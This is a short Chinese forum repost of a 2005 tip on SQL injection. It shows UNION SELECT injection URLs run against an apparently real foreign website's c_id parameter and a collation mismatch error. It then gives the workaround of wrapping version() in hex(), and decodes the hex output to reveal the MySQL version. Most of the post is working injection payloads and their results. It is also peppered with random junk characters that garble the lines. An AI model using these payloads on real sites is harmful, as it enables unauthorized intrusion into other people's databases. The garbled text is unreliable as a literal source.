本文作者:SuperHei5 v7 k! j6 Q9 q4 W9 f! }2 x
文章性质:原创
$ N" P; d7 s0 z* ]% g7 v, _# y发布日期:2005-10-18) c; t3 h2 K, N1 L
测试个国外的站时:, J0 _6 |: A# Y
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*2 l: L, D2 L! v/ W6 @
返回错误:
* [6 N$ p+ g9 i: nIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION' C4 G6 h! Z4 b
MySQL Error No. 126, Z. ~! Q5 D- u4 L) M* w
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。. y$ ^% o1 [( F
解决办法:转为其他编码如hex。
5 ]+ b$ X) L: j* Y/ X- }3 q; Hurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*2 w9 F+ E6 |- Q, U, o0 {
成功得到hex(version())的值为:
/ O- a- }& a6 p% |4 y- U342E312E332D62657461: U/ P4 E: c3 j
回Mysql查询下得到:' c1 u3 ?: a. e1 }% T9 N
mysql> select 0x342E312E332D62657461;' H! j6 I; ?$ T; @) B3 k
+------------------------+: O& l) X) |5 e# c h3 R
| 0x342E312E332D62657461 |) t: g9 j7 m% {
+------------------------+
$ r8 V# o, D1 ^0 e8 n! n| 4.1.3-beta |- j& [ N% G$ {
+------------------------+9 }+ C3 k9 P3 V2 ~# d G4 n
1 row in set (0.00 sec)# g- Z3 Q; _9 y3 E
- f5 Z" | q( v& S" H
|
发表于 2012-9-15 14:04:54
收藏
支持
反对